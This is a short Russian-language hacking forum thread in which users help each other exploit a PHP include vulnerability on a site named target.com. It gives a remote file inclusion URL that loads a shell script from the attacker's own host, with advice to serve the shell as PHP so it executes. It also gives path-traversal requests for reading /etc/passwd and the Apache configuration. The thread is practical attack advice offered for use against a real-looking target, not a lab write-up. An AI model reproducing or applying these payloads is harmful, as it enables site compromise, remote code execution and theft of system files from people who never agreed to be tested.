вот чтоу меня получилось: запрос допустим такой- http://www.target.com/index1.php?page=http://mysite.com/shell.txt в браузере вижу - Warning: Failed opening './http://mypage.org/shell.txt' for inclusion (include_path='.:/usr/share/pear:/home/httpd/phplib') in /home/target/public_html/index1.php on line 63 ./ - возможно ли как-то обойти, чтобы заинклудить файл/скрипт/что_нибудь_ещё? Не гнобите сильно, если это проскакивает тут в стотысячный раз )
шелл нужно заливать на сайт с расширением php (!) А не с тхт - он выполнятся должен, а серевер на котором возможно есть инклуд, воспринимает его как обычный текстовик. И еще на конце не нужно писать расширение пхп - http://mypage.com/shell если не катит то можно попробыва добавить его - в разных системах по разному
попробуй __http://www.target.com/index1.php?page=../../../etc/passwd Если пройдёт то __http://www.target.com/index1.php?page=../../../etc/apache/httpd.conf
опять же непонятно число уровней до корневой директории с корня веб-сервака. т.е. количество "../" менять постепенно вверх. [offtop] ну почему у меня ник темно-зеленый, а у лимпопо - светло-зеленый? [/offtop]
никогда не понимал смысл вот этого наверное статьи аля 80х, где цель всегда passwd, оставили свой след...
